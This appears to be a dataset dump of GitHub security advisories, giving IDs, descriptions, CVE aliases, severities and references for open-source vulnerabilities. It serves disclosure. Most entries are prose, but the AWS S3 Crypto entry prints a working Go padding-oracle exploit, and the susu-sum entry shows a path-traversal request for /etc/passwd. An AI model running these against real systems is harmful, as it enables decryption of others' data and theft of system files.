ecosystem
stringclasses
14 values
vuln_id
stringlengths
10
19
summary
stringlengths
4
267
details
stringlengths
9
13.5k
aliases
stringlengths
17
144
modified_date
stringdate
2010-05-27 05:47:00
2022-05-10 08:46:52
published_date
stringdate
2005-12-31 05:00:00
2022-05-10 08:46:50
severity
stringclasses
5 values
score
float64
0
10
cwe_id
stringclasses
988 values
refs
stringlengths
30
17.7k
introduced
stringlengths
75
4.26k
GHSA
GHSA-9f3j-pm6f-9fm5
Race condition in Apache Tomcat
The fix for bug CVE-2020-9484 introduced a time of check time of use vulnerability into Apache Tomcat 10.1.0-M1 to 10.1.0-M8, 10.0.0-M5 to 10.0.14, 9.0.35 to 9.0.56 and 8.5.55 to 8.5.73 that allowed a local attacker to perform actions with the privileges of the user that the Tomcat process is using. This issue is only exploitable when Tomcat is configured to persist sessions using the FileStore.
{'CVE-2022-23181'}
2022-04-22T15:34:54Z
2022-02-01T00:45:44Z
HIGH
7
{'CWE-367'}
{'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://lists.apache.org/thread/l8x62p3k19yfcb208jo4zrb83k5mfwg9', 'https://nvd.nist.gov/vuln/detail/CVE-2022-23181', 'https://github.com/advisories/GHSA-9f3j-pm6f-9fm5', 'https://security.netapp.com/advisory/ntap-20220217-0010/'}
null
GHSA
GHSA-353r-3v84-9pjj
Malicious Package in nothing-js
`nothing-js` contained a malicious script that attempted to delete all files when `npm test` was run. ## Recommendation This module has been unpublished from the npm Registry. If you find this module in your environment remove it.
null
2021-10-01T13:25:57Z
2020-09-01T20:40:36Z
CRITICAL
9.8
{'CWE-506'}
{'https://www.npmjs.com/advisories/650', 'https://github.com/advisories/GHSA-353r-3v84-9pjj'}
null
GHSA
GHSA-g5wh-fw4m-2v28
CSRF vulnerability in Jenkins autonomiq plugin
A cross-site request forgery (CSRF) vulnerability in Jenkins autonomiq Plugin 1.15 and earlier allows attackers to connect to an attacker-specified URL server using attacker-specified credentials.
{'CVE-2022-25194'}
2022-05-04T20:57:42Z
2022-02-16T00:01:23Z
HIGH
8.8
{'CWE-352'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-25194', 'https://github.com/jenkinsci/autonomiq-plugin/commit/e06b1ff67664a90819c9561bbc12f4c6e593d1dc', 'https://www.jenkins.io/security/advisory/2022-02-15/#SECURITY-2545', 'https://github.com/advisories/GHSA-g5wh-fw4m-2v28'}
null
GHSA
GHSA-wfw3-rgfr-6g67
XSS via Angular Expression in ag-grid
Affected versions of `ag-grid` are vulnerable to Cross-site Scripting (XSS) via Angular Expressions, if used in combination with AngularJS. ## Recommendation Avoid using `ag-grid` in combination with AngularJS until a fix is available.
{'CVE-2017-16009'}
2021-01-14T15:55:50Z
2020-09-01T16:40:42Z
MODERATE
0
{'CWE-79'}
{'https://github.com/advisories/GHSA-wfw3-rgfr-6g67', 'https://nodesecurity.io/advisories/327', 'https://spring.io/blog/2016/01/28/angularjs-escaping-the-expression-sandbox-for-xss', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16009', 'https://www.npmjs.com/advisories/327', 'https://github.com/ceolter/ag-grid/issues/1287'}
null
GHSA
GHSA-8h77-3xwr-hqhh
Cross-site scripting in Jenkins Kiuwan Plugin
Jenkins Kiuwan Plugin 1.6.0 and earlier does not escape query parameters in an error message for a form validation endpoint, resulting in a reflected cross-site scripting (XSS) vulnerability.
{'CVE-2021-21666'}
2021-06-16T20:03:18Z
2021-06-16T17:10:50Z
MODERATE
6.1
{'CWE-79'}
{'https://www.jenkins.io/security/advisory/2021-06-10/#SECURITY-2367', 'https://nvd.nist.gov/vuln/detail/CVE-2021-21666', 'https://github.com/advisories/GHSA-8h77-3xwr-hqhh', 'http://www.openwall.com/lists/oss-security/2021/06/10/14'}
null
GHSA
GHSA-3q49-h8f9-9fr9
Missing TLS certificate verification
Faye uses [em-http-request][6] and [faye-websocket][10] in the Ruby version of its client. Those libraries both use the [`EM::Connection#start_tls`][1] method in [EventMachine][2] to implement the TLS handshake whenever a `wss:` URL is used for the connection. This method does not implement certificate verification by default, meaning that it does not check that the server presents a valid and trusted TLS certificate for the expected hostname. That means that any `https:` or `wss:` connection made using these libraries is vulnerable to a man-in-the-middle attack, since it does not confirm the identity of the server it is connected to. The first request a Faye client makes is always sent via normal HTTP, but later messages may be sent via WebSocket. Therefore it is vulnerable to the same problem that these underlying libraries are, and we needed both libraries to support TLS verification before Faye could claim to do the same. Your client would still be insecure if its initial HTTPS request was verified, but later WebSocket connections were not. This has been a requested feature in EventMachine for many years now; see for example [#275][3], [#378][4], and [#814][5]. In June 2020, em-http-request published an [advisory][7] related to this problem and fixed it by [implementing TLS verification][8] in their own codebase; although EventMachine does not implement certificate verification itself, it provides an extension point for the caller to implement it, called [`ssl_verify_peer`][9]. Based on this implementation, we have incorporated similar functionality into faye-websocket. After implementing verification in v1.1.6, em-http-request has elected to leave the `:verify_peer` option switched off by default. We have decided to _enable_ this option by default in Faye, but are publishing a minor release with added functionality for configuring it. We are mindful of the fact that this may break existing programs, but we consider it much more important that all clients have TLS verification turned on by default. A client that is not carrying out verification is either: - talking to the expected server, and will not break under this change - being attacked, and would benefit from being alerted to this fact - deliberately talking to a server that would be rejected by verification The latter case includes situations like talking to a non-public server using a self-signed certificate. We consider this use case to be "working by accident", rather than functionality that was actively supported, and it should be properly and explicitly supported instead. We are releasing Faye v1.4.0, which enables verification by default and provides a way to opt out of it: ```rb client = Faye::Client.new('https://example.com/', tls: { verify_peer: false }) ``` Unfortunately we can't offer an equivalent of the `:root_cert_file` option that has been added to faye-websocket, because em-http-request does not support it. If you need to talk to servers whose certificates are not recognised by your default root certificates, then you need to add its certificate (or another one that can verify it) to your system's root set. The same functionality is now supported in the Node.js version, with a `tls` option whose values will be passed to the `https` and `tls` modules as appropriate when making connections. For example, you can provide your own CA certificate: ```js var client = new faye.Client('https://example.com/', { tls: { ca: fs.readFileSync('path/to/certificate.pem') } }); ``` For further background information on this issue, please see [faye#524][12] and [faye-websocket#129][13]. We would like to thank [Tero Marttila][14] and [Daniel Morsing][15] for providing invaluable assistance and feedback on this issue. [1]: https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:start_tls [2]: https://rubygems.org/gems/eventmachine [3]: https://github.com/eventmachine/eventmachine/issues/275 [4]: https://github.com/eventmachine/eventmachine/pull/378 [5]: https://github.com/eventmachine/eventmachine/issues/814 [6]: https://rubygems.org/gems/em-http-request [7]: https://securitylab.github.com/advisories/GHSL-2020-094-igrigorik-em-http-request [8]: https://github.com/igrigorik/em-http-request/pull/340 [9]: https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:ssl_verify_peer [10]: https://rubygems.org/gems/faye-websocket [11]: https://faye.jcoglan.com/ [12]: https://github.com/faye/faye/issues/524 [13]: https://github.com/faye/faye-websocket-ruby/pull/129 [14]: https://github.com/SpComb [15]: https://github.com/DanielMorsing
{'CVE-2020-15134'}
2021-01-07T23:42:42Z
2020-07-31T17:39:42Z
HIGH
8
{'CWE-295'}
{'https://blog.jcoglan.com/2020/07/31/missing-tls-verification-in-faye/', 'https://github.com/faye/faye/issues/524', 'https://github.com/eventmachine/eventmachine/pull/378', 'https://github.com/faye/faye-websocket-ruby/pull/129', 'https://github.com/igrigorik/em-http-request/pull/340', 'https://github.com/eventmachine/eventmachine/issues/814', 'https://securitylab.github.com/advisories/GHSL-2020-094-igrigorik-em-http-request', 'https://github.com/faye/faye/security/advisories/GHSA-3q49-h8f9-9fr9', 'https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:ssl_verify_peer', 'https://www.rubydoc.info/github/eventmachine/eventmachine/EventMachine/Connection:start_tls', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15134', 'https://github.com/eventmachine/eventmachine/issues/275', 'https://github.com/advisories/GHSA-3q49-h8f9-9fr9'}
null
GHSA
GHSA-427q-jp8v-ww95
Cross-site Scripting in kimai2
CSRF related to duplicate action. (the duplication occurs first before redirecting to edit form). This vulnerability is capable of tricking admin users to duplicate teams.
{'CVE-2021-3976'}
2021-11-23T18:16:50Z
2021-11-23T18:16:50Z
MODERATE
4.3
{'CWE-352'}
{'https://github.com/advisories/GHSA-427q-jp8v-ww95', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3976', 'https://github.com/kevinpapst/kimai2/commit/b28e9c120c87222e21a238f1b03a609d6a5d506e', 'https://huntr.dev/bounties/0567048a-118c-42ec-9f94-b55533017406'}
null
GHSA
GHSA-8mgg-5x65-m4m4
Command Injection in soletta-dev-app
All versions of `soletta-dev-app` are vulnerable to Command Injection. The package does not validate user input on the `/api/service/status` API endpoint, passing contents of the `service` query parameter to an exec call. This may allow attackers to run arbitrary commands in the system. ## Recommendation No fix is currently available. Consider using an alternative module until a fix is made available.
null
2021-09-28T15:18:09Z
2020-09-11T21:08:19Z
HIGH
0
{'CWE-77'}
{'https://github.com/advisories/GHSA-8mgg-5x65-m4m4', 'https://www.npmjs.com/advisories/958'}
null
GHSA
GHSA-799f-r78p-gq9c
Use of Uninitialized Resource in acc_reader.
An issue was discovered in the acc_reader crate through 2020-12-27 for Rust. read_up_to may read from uninitialized memory locations.
{'CVE-2020-36513'}
2022-01-07T16:22:25Z
2022-01-06T22:17:38Z
CRITICAL
9.8
{'CWE-908'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-36513', 'https://rustsec.org/advisories/RUSTSEC-2020-0155.html', 'https://github.com/advisories/GHSA-799f-r78p-gq9c', 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/acc_reader/RUSTSEC-2020-0155.md'}
null
GHSA
GHSA-gr23-g276-xc73
Cross Site Request Forgery in concrete5/concrete5
A cross-site request forgery vulnerability exists in Concrete CMS <v9 that could allow an attacker to make requests on behalf of other users.
{'CVE-2021-22954'}
2022-02-17T13:22:51Z
2022-02-11T00:00:58Z
HIGH
0
{'CWE-352'}
{'https://documentation.concretecms.org/developers/introduction/version-history/90-release-notes', 'https://nvd.nist.gov/vuln/detail/CVE-2021-22954', 'https://github.com/advisories/GHSA-gr23-g276-xc73'}
null
GHSA
GHSA-954c-jjx6-cxv7
Reflected XSS from the callback handler's error query parameter
### Overview Versions before and including `1.4.1` are vulnerable to reflected XSS. An attacker can execute arbitrary code by providing an XSS payload in the `error` query parameter which is then processed by the callback handler as an error message. ### Am I affected? You are affected by this vulnerability if you are using `@auth0/nextjs-auth0` version `1.4.1` or lower **unless** you are using custom error handling that does not return the error message in an HTML response. ### How to fix that? Upgrade to version `1.4.2`. ### Will this update impact my users? The fix adds basic HTML escaping to the error message and it should not impact your users. ### Credit https://github.com/inian https://github.com/git-ishanpatel
{'CVE-2021-32702'}
2022-04-19T19:03:01Z
2021-06-28T16:46:41Z
HIGH
8
{'CWE-79'}
{'https://nvd.nist.gov/vuln/detail/CVE-2021-32702', 'https://github.com/advisories/GHSA-954c-jjx6-cxv7', 'https://www.npmjs.com/package/@auth0/nextjs-auth0', 'https://github.com/auth0/nextjs-auth0/security/advisories/GHSA-954c-jjx6-cxv7', 'https://github.com/auth0/nextjs-auth0/commit/6996e2528ceed98627caa28abafbc09e90163ccf'}
null
GHSA
GHSA-j6w9-fv6q-3q52
Percent-encoded cookies can be used to overwrite existing prefixed cookie names
A reliance on cookies without validation/integrity check security vulnerability exists in rack < 2.2.3, rack < 2.1.4 that makes it is possible for an attacker to forge a secure or host-only cookie prefix.
{'CVE-2020-8184'}
2021-01-08T21:28:23Z
2020-06-24T17:15:00Z
HIGH
0
{'CWE-784'}
{'https://github.com/advisories/GHSA-j6w9-fv6q-3q52', 'https://github.com/rack/rack/commit/1f5763de6a9fe515ff84992b343d63c88104654c', 'https://nvd.nist.gov/vuln/detail/CVE-2020-8184', 'https://hackerone.com/reports/895727', 'https://lists.debian.org/debian-lts-announce/2020/07/msg00006.html', 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2020-8184.yml', 'https://usn.ubuntu.com/4561-1/', 'https://groups.google.com/g/rubyonrails-security/c/OWtmozPH9Ak'}
null
GHSA
GHSA-cp67-8w3w-6h9c
Path Traversal
A vulnerability was found in keycloak, where path traversal using URL-encoded path segments in the request is possible because the resources endpoint applies a transformation of the url path to the file path. Only few specific folder hierarchies can be exposed by this flaw
{'CVE-2020-14366'}
2022-02-09T00:58:03Z
2022-02-09T00:58:03Z
HIGH
7.5
{'CWE-22'}
{'https://nvd.nist.gov/vuln/detail/CVE-2020-14366', 'https://github.com/advisories/GHSA-cp67-8w3w-6h9c', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-14366'}
null
GHSA
GHSA-wq3r-jwrq-xg6w
Canceling of orders not related to the logged-in user
### Impact Canceling of orders not related to the logged-in user ### Patches We recommend updating to the current version 6.4.1.1. You can get the update to 6.4.1.1 regularly via the Auto-Updater or directly via the download overview. https://www.shopware.com/en/download/#shopware-6 ### Workarounds For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659
null
2021-06-28T16:57:23Z
2021-06-28T16:57:23Z
MODERATE
0
null
{'https://github.com/advisories/GHSA-wq3r-jwrq-xg6w', 'https://github.com/shopware/platform/security/advisories/GHSA-wq3r-jwrq-xg6w', 'https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659', 'https://www.shopware.com/en/download/#shopware-6'}
null
GHSA
GHSA-rhg5-fqr3-hrf5
Injection in DeltaSpike
we got reports for 2 injection attacks against the DeltaSpike windowhandler.js. This is only active if a developer selected the ClientSideWindowStrategy which is not the default.
{'CVE-2019-12416'}
2022-02-10T20:54:31Z
2022-02-10T20:54:31Z
MODERATE
6.1
{'CWE-74'}
{'https://nvd.nist.gov/vuln/detail/CVE-2019-12416', 'https://lists.apache.org/thread.html/r848d7d4c0bf637da55f01103eb8ba0fce344c295fda53264cbaa1568@%3Ccommits.camel.apache.org%3E', 'https://github.com/advisories/GHSA-rhg5-fqr3-hrf5', 'https://lists.apache.org/thread.html/r8f327712b2b07f867fde1e77cbafcf8cc6a3facaa693ffdd2c3285e3%40%3Cdev.deltaspike.apache.org%3E'}
null
GHSA
GHSA-2mp8-qvqm-3xwq
Restlet Framework, when using SimpleXMLProvider, allows remote attackers to access arbitrary files via an XXE attack in a REST API HTTP request
Restlet Framework before 2.3.11, when using SimpleXMLProvider, allows remote attackers to access arbitrary files via an XXE attack in a REST API HTTP request. This affects use of the Jax-rs extension.
{'CVE-2017-14868'}
2022-04-26T21:37:36Z
2018-10-17T00:04:31Z
HIGH
7.5
{'CWE-611'}
{'https://github.com/restlet/restlet-framework-java/wiki/XEE-security-enhancements', 'https://nvd.nist.gov/vuln/detail/CVE-2017-14868', 'https://github.com/restlet/restlet-framework-java/issues/1286', 'https://lgtm.com/blog/restlet_CVE-2017-14868', 'https://github.com/advisories/GHSA-2mp8-qvqm-3xwq'}
null
GHSA
GHSA-5p5w-j3g7-w4wv
Authentication bypass via incorrect XML canonicalization and DOM traversal in saml2-js
Versions of `saml2-js` prior to 1.12.4 or 2.0.2 are vulnerable to authentication bypass. The `saml2-js` library may incorrectly utilize the results of XML DOM traversal and canonicalization APIs in such a way that an attacker may be able to manipulate the SAML data without invalidating the cryptographic signature, allowing the attack to potentially bypass authentication to SAML service providers. Security Assertion Markup Language (SAML) is an XML-based markup language for security assertions regarding authentication and permissions, most commonly used for single sign-on (SSO) services. Some XML DOM traversal and canonicalization APIs may be inconsistent in handling of comments within XML nodes. Incorrect use of these APIs by some SAML libraries results in incorrect parsing of the inner text of XML nodes such that any inner text after the comment is lost prior to cryptographically signing the SAML message. Text after the comment therefore has no impact on the signature on the SAML message. A remote attacker can modify SAML content for a SAML service provider without invalidating the cryptographic signature, which may allow attackers to bypass primary authentication for the affected SAML service provider ## Recommendation If you use 1.x upgrade to version 1.12.4 or greater If you use 2.x upgrade to version 2.02 or greater
{'CVE-2017-11429'}
2021-06-11T14:24:19Z
2019-07-05T21:11:18Z
MODERATE
7.7
{'CWE-287'}
{'https://github.com/advisories/GHSA-5p5w-j3g7-w4wv', 'https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations', 'https://nvd.nist.gov/vuln/detail/CVE-2017-11429', 'https://www.npmjs.com/advisories/567', 'https://www.kb.cert.org/vuls/id/475445'}
null
GHSA
GHSA-vx85-mj8c-4qm6
Moderate severity vulnerability that affects org.apache.thrift:libthrift
The Apache Thrift Node.js static web server in versions 0.9.2 through 0.11.0 have been determined to contain a security vulnerability in which a remote user has the ability to access files outside the set webservers docroot path.
{'CVE-2018-11798'}
2021-06-10T20:04:09Z
2019-01-17T13:56:33Z
MODERATE
6.5
{'CWE-538'}
{'https://access.redhat.com/errata/RHSA-2019:3140', 'https://nvd.nist.gov/vuln/detail/CVE-2018-11798', 'https://access.redhat.com/errata/RHSA-2019:1545', 'http://www.securityfocus.com/bid/106501', 'https://github.com/advisories/GHSA-vx85-mj8c-4qm6', 'https://lists.apache.org/thread.html/6e9edd282684896cedf615fb67a02bebfe6007f2d5baf03ba52e34fd@%3Cuser.thrift.apache.org%3E', 'https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html'}
null
GHSA
GHSA-97gv-3p2c-xw7j
Denial of Service and Content Injection in i18n-node-angular
Versions of `i18n-node-angular` prior to 1.4.0 are affected by denial of service and cross-site scripting vulnerabilities. The vulnerabilities exist in a REST endpoint that was created for development purposes, but was not disabled in production in affected versions. ## Recommendation Update to version 1.4.0 or later.
{'CVE-2016-10524'}
2022-02-11T17:08:46Z
2019-02-18T23:39:06Z
HIGH
8.2
{'CWE-74', 'CWE-400'}
{'https://nvd.nist.gov/vuln/detail/CVE-2016-10524', 'https://www.npmjs.com/advisories/80', 'https://nodesecurity.io/advisories/80', 'https://github.com/advisories/GHSA-97gv-3p2c-xw7j', 'https://github.com/oliversalzburg/i18n-node-angular/commit/877720d2d9bb90dc8233706e81ffa03f99fc9dc8'}
null
GHSA
GHSA-v384-jqmq-fc74
XSS in Dolibarr ERP & CRM
htdocs/user/passwordforgotten.php in Dolibarr 10.0.6 allows XSS via the Referer HTTP header.
{'CVE-2020-7996'}
2021-08-19T16:47:32Z
2020-01-28T22:26:16Z
MODERATE
6.1
{'CWE-79'}
{'https://tufangungor.github.io/exploit/2020/01/18/dolibarr-10.0.6-xss-in-http-header.html', 'https://github.com/Dolibarr/dolibarr', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7996', 'https://github.com/tufangungor/tufangungor.github.io/blob/master/_posts/2020-01-19-dolibarr-10.0.6-xss-in-http-header.md', 'https://github.com/advisories/GHSA-v384-jqmq-fc74'}
null
GHSA
GHSA-77hv-8796-8ccp
Moderate severity vulnerability that affects Plone and Zope2
ZPublisher.HTTPRequest._scrubHeader in Zope 2 before 2.13.19, as used in Plone before 4.3 beta 1, allows remote attackers to inject arbitrary HTTP headers via a linefeed (LF) character.
{'CVE-2012-5486'}
2021-06-11T15:32:57Z
2018-07-23T19:51:50Z
MODERATE
0
null
{'http://www.openwall.com/lists/oss-security/2012/11/10/1', 'https://nvd.nist.gov/vuln/detail/CVE-2012-5486', 'https://bugs.launchpad.net/zope2/+bug/930812', 'https://github.com/advisories/GHSA-77hv-8796-8ccp', 'http://rhn.redhat.com/errata/RHSA-2014-1194.html', 'https://plone.org/products/plone/security/advisories/20121106/02', 'https://plone.org/products/plone-hotfix/releases/20121106'}
null
GHSA
GHSA-jwph-qp5h-f9wj
Data races in bunch
An issue was discovered in the bunch crate through 2020-11-12 for Rust. Affected versions of this crate unconditionally implements `Send`/`Sync` for `Bunch<T>`. This allows users to insert `T: !Sync` to `Bunch<T>`. It is possible to create a data race to a `T: !Sync` by invoking the `Bunch::get()` API (which returns `&T`) from multiple threads. It is also possible to send `T: !Send` to other threads by inserting `T` inside `Bunch<T>` and sending `Bunch<T>` to another thread, allowing to create a data race by inserting types like `T = Rc<_>`. Such data races can lead to memory corruption.
{'CVE-2020-36450'}
2021-08-25T20:59:18Z
2021-08-25T20:59:18Z
HIGH
8.1
{'CWE-362', 'CWE-77'}
{'https://github.com/krl/bunch/issues/1', 'https://rustsec.org/advisories/RUSTSEC-2020-0130.html', 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/bunch/RUSTSEC-2020-0130.md', 'https://nvd.nist.gov/vuln/detail/CVE-2020-36450', 'https://github.com/advisories/GHSA-jwph-qp5h-f9wj'}
null
GHSA
GHSA-8p5c-f328-9fvv
Diffoscope may write to arbitrary locations due to an untrusted archive
diffoscope before 76 writes to arbitrary locations on disk based on the contents of an untrusted archive.
{'CVE-2017-0359'}
2022-04-26T18:16:33Z
2018-07-13T16:01:21Z
CRITICAL
9.8
{'CWE-22'}
{'https://security-tracker.debian.org/tracker/CVE-2017-0359', 'https://github.com/advisories/GHSA-8p5c-f328-9fvv', 'https://github.com/anthraxx/diffoscope/commit/632a40828a54b399787c25e7fa243f732aef7e05', 'https://nvd.nist.gov/vuln/detail/CVE-2017-0359', 'https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=854723'}
null
GHSA
GHSA-f5pg-7wfw-84q9
CBC padding oracle issue in AWS S3 Crypto SDK for golang
### Summary The golang AWS S3 Crypto SDK is impacted by an issue that can result in loss of confidentiality and message forgery. The attack requires write access to the bucket in question, and that the attacker has access to an endpoint that reveals decryption failures (without revealing the plaintext) and that when encrypting the CBC option was chosen as content cipher. ### Risk/Severity The vulnerability pose insider risks/privilege escalation risks, circumventing KMS controls for stored data. ### Impact This advisory describes the plaintext revealing vulnerabilities in the golang AWS S3 Crypto SDK, with a similar issue in the non "strict" versions of C++ and Java S3 Crypto SDKs being present as well. V1 prior to 1.34.0 of the S3 crypto SDK, allows users to encrypt files with AES-CBC, without computing a MAC on the data. Note that there is an alternative option of using AES-GCM, which is used in the examples of the documentation and not affected by this vulnerability, but by CVE-2020-8912. This exposes a padding oracle vulnerability: If the attacker has write access to the S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file (without observing the file contents that the endpoint learns in the process), they can reconstruct the plaintext with (on average) `128*length(plaintext)` queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors. This issue is fixed in V2 of the API, by disabling encryption with CBC mode for new files. Old files, if they have been encrypted with CBC mode, remain vulnerable until they are reencrypted with AES-GCM. ### Mitigation Using the version 2 of the S3 crypto SDK will not produce vulnerable files anymore. Old files remain vulnerable to this problem if they were originally encrypted with CBC mode. ### Proof of concept A [Proof of concept](https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc) is available in a separate github repository. This particular issue is described in [padding_oracle_exploit.go](https://github.com/sophieschmieg/exploits/blob/master/aws_s3_crypto_poc/exploit/padding_oracle_exploit.go): ```golang func PaddingOracleExploit(bucket string, key string, input *OnlineAttackInput) (string, error) { data, header, err := input.S3Mock.GetObjectDirect(bucket, key) if alg := header.Get("X-Amz-Meta-X-Amz-Cek-Alg"); alg != "AES/CBC/PKCS5Padding" { return "", fmt.Errorf("Algorithm is %q, not CBC!", alg) } length, err := strconv.Atoi(header.Get("X-Amz-Meta-X-Amz-Unencrypted-Content-Length")) padding := byte(len(data) - length) plaintext := make([]byte, length) for i := length - 1; i >= 0; i-- { newLength := 16 * (i/16 + 1) dataCopy := make([]byte, newLength) headerCopy := header.Clone() copy(dataCopy, data) // Set Padding newPadding := byte(newLength - i) for j := i + 1; j < newLength; j++ { var oldValue byte if j >= length { oldValue = padding } else { oldValue = plaintext[j] } dataCopy, headerCopy, err = xorData(oldValue^newPadding, j, dataCopy, headerCopy) if err != nil { return "", err } } // Guess for c := 0; c < 256; c++ { dataCopy, headerCopy, err := xorData(byte(c)^newPadding, i, dataCopy, headerCopy) input.S3Mock.PutObjectDirect(bucket, key+"guess", dataCopy, headerCopy) if input.Oracle(bucket, key+"guess") { plaintext[i] = byte(c) break } dataCopy, headerCopy, err = xorData(byte(c)^newPadding, i, dataCopy, headerCopy) } } return string(plaintext), nil } ```
{'CVE-2020-8911'}
2022-04-19T19:02:32Z
2022-02-11T23:26:26Z
MODERATE
5.6
{'CWE-327'}
{'https://bugzilla.redhat.com/show_bug.cgi?id=1869800', 'https://nvd.nist.gov/vuln/detail/CVE-2020-8911', 'https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9', 'https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc', 'https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09', 'https://github.com/aws/aws-sdk-go/pull/3403', 'https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e', 'https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4', 'https://github.com/advisories/GHSA-f5pg-7wfw-84q9'}
null
GHSA
GHSA-f3j5-rmmp-3fc5
Improper Input Validation in jackson-databind
A Polymorphic Typing issue was discovered in FasterXML jackson-databind before 2.9.10. It is related to net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup.
{'CVE-2019-17267'}
2021-08-30T14:18:34Z
2020-06-15T18:44:48Z
CRITICAL
9.8
{'CWE-502'}
{'https://github.com/FasterXML/jackson-databind/issues/2460', 'https://access.redhat.com/errata/RHSA-2019:3200', 'https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0445', 'https://www.oracle.com/security-alerts/cpujan2020.html', 'https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E', 'https://security.netapp.com/advisory/ntap-20191017-0006/', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://access.redhat.com/errata/RHSA-2020:0161', 'https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10', 'https://lists.apache.org/thread.html/r392099ed2757ff2e383b10440594e914d080511d7da1c8fed0612c1f@%3Ccommits.druid.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0160', 'https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0159', 'https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E', 'https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E', 'https://github.com/advisories/GHSA-f3j5-rmmp-3fc5', 'https://lists.debian.org/debian-lts-announce/2019/12/msg00013.html', 'https://nvd.nist.gov/vuln/detail/CVE-2019-17267', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://lists.apache.org/thread.html/r9d727fc681fb3828794acbefcaee31393742b4d73a29461ccd9597a8@%3Cdev.skywalking.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0164'}
null
GHSA
GHSA-6x46-7rrv-m4h8
Low severity vulnerability that affects sqlite3-ruby
The sqlite3-ruby gem in the rubygem-sqlite3 package before 1.2.4-0.5.1 in SUSE Linux Enterprise (SLE) 11 SP1 uses weak permissions for unspecified files, which allows local users to gain privileges via unknown vectors.
{'CVE-2011-0995'}
2021-09-02T19:09:05Z
2017-10-24T18:33:38Z
LOW
0
null
{'https://github.com/advisories/GHSA-6x46-7rrv-m4h8', 'https://nvd.nist.gov/vuln/detail/CVE-2011-0995', 'http://www.osvdb.org/72180', 'http://www.securityfocus.com/bid/47694', 'https://exchange.xforce.ibmcloud.com/vulnerabilities/67263', 'http://support.novell.com/security/cve/CVE-2011-0995.html', 'https://bugzilla.novell.com/show_bug.cgi?id=685928', 'http://secunia.com/advisories/44418'}
null
GHSA
GHSA-w7jg-972m-rphv
Directory Traversal in susu-sum
Affected versions of `susu-sum` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system. Example request: ``` GET /../../../../../../../../../../etc/passwd HTTP/1.1 host:foo ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
{'CVE-2017-16199'}
2021-01-14T15:40:13Z
2020-09-01T18:17:28Z
HIGH
0
{'CWE-22'}
{'https://nvd.nist.gov/vuln/detail/CVE-2017-16199', 'https://nodesecurity.io/advisories/429', 'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/susu-sum', 'https://www.npmjs.com/advisories/429', 'https://github.com/advisories/GHSA-w7jg-972m-rphv'}
null
GHSA
GHSA-h2jv-5v3f-7m7j
Downloads Resources over HTTP in adamvr-geoip-lite
Affected versions of `adamvr-geoip-lite` insecurely download resources over HTTP. In scenarios where an attacker has a privileged network position, they can modify or read such resources at will. This could impact the integrity and availability of the data being used to make geolocation decisions by an application. ## Recommendation No patch is currently available for this vulnerability. The best mitigation is currently to avoid using this package, using a different package if available. Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
{'CVE-2016-10680'}
2021-01-14T15:57:09Z
2020-09-01T16:10:03Z
MODERATE
0
{'CWE-311'}
{'https://github.com/advisories/GHSA-h2jv-5v3f-7m7j', 'https://nodesecurity.io/advisories/283', 'https://www.npmjs.com/advisories/283', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10680'}
null
GHSA
GHSA-5hjh-c26m-xw8w
